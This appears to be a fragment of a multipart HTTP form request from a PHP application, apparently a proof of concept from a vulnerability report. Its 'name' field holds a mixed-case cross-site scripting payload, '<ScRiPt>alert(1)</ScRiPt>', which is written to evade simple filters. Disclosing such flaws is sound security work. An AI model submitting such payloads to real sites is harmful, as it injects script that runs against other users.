    Content-Disposition: form-data; name="id"
    
    2
    -----------------------------39324278941716868132909560787
    Content-Disposition: form-data; name="name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------39324278941716868132909560787
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------39324278941716868132909560787--

Tag

#php